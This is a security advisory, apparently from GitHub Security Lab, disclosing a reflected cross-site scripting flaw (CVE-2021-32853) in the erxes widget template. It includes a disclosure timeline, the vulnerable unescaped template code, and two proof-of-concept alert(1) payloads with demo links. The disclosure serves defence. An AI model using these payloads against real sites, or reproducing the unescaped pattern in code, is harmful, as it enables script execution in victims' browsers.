Coordinated Disclosure Timeline
- 2021-08-31: Report sent to the maintainer.
- 2021-09-03: No response. Sent again.
- 2021-12-06: Asked for update.
- 2021-12-07: Added info@erxes.io to recipients.
- 2021-12-07: Public issue asking for contacts created.
- 2022-01-19: An invitation to a private repo with the report was sent to all members of Erxes org.
- 2022-01-19: All members of Erxes org are tagged in the public issue with an explanation what the invitation is about.
- 2022-01-19: One of the members accepts the invitation.
- 2022-02-01: No response. Publishing according to our coordinated disclosure policy.
Summary
Cross-Site scripting in https://github.com/erxes/erxes.
Product
https://github.com/erxes/erxes
Tested Version
The latest version to the date.
Details
This template tag in widgets.ejs is vulnerable to code injection:
window.knowledgebaseSettings = {
topic_id: "<%- kbTopicId %>"
}
The value comes from a request parameter here:
res.render('widget', {
type: 'knowledgebase',
env: getEnv(),
kbTopicId: req.query.topicId
});
The inserted value is not escaped, so one can break out of the string literal or the enclosing script tag:
widgets/knowledgebase?topicId=%22-alert(1)-%22widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
At the time of writing, this can be verified on the live demo following these links: (they are harmless)
- (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%22-alert(1)-%22
- (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
CVE
- CVE-2021-32853
Impact
Code Execution (on client side). The victim must follow a malicious link or be redirected from a malicious web site.
Credit
This issue was discovered by @asgerf (Asger F) from the GitHub CodeQL team.
Contact
You can contact the GHSL team at securitylab@github.com, please include GHSL-2021-103 in any communication regarding this issue.